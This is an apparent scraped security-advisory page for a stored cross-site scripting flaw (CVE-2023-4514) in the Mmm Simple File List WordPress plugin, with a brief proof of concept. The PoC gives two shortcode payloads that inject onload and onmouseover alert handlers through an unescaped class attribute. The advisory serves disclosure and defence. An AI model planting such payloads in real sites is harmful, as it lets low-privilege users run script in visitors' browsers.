Lucene search
Erwan LR (WPScan)WPVDB-ID:365B15E6-3755-4ED5-BADD-C9DD962BD9FAHistoryNov 06, 2023 - 12:00 a.m.
Mmm Simple File List <= 2.3 - Contributor+ Stored XSS
2023-11-0600:00:00
Erwan LR (WPScan)
wpscan.com
2
xss
shortcode
contributor
validation
escaping
cross-site scripting
plugin
security
0.0004 Low
EPSS
Percentile
14.2%
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
PoC
As a contributor, put the below shortcodes in a post [MMFileList folder=‘…/…/’ format=‘img’ class=‘" onload=alert(/XSS/)//’] (the folder the reach must contain images for the XSS to trigger) [MMFileList folder=‘…/…’ class=‘" onmouseover=alert(/XSS/)//’] (the XSS will be triggered when moving the mouse over the generated list)
Related
nvd
nvd
CVE-2023-4514
2023-11-27 17:15:08
wpexploit
wpexploit
Mmm Simple File List <= 2.3 - Contributor+ Stored XSS
2023-11-06 00:00:00
cve
cve
CVE-2023-4514
2023-11-27 17:15:08
cvelist
cvelist
CVE-2023-4514 Mmm Simple File List <= 2.3 - Contributor+ Stored XSS
2023-11-27 16:22:04
prion
prion
Cross site scripting
2023-11-27 17:15:00
fedora
fedora
[SECURITY] Fedora 39 Update: caddy-2.7.6-1.fc39
2024-02-19 02:29:13
wordfence
wordfence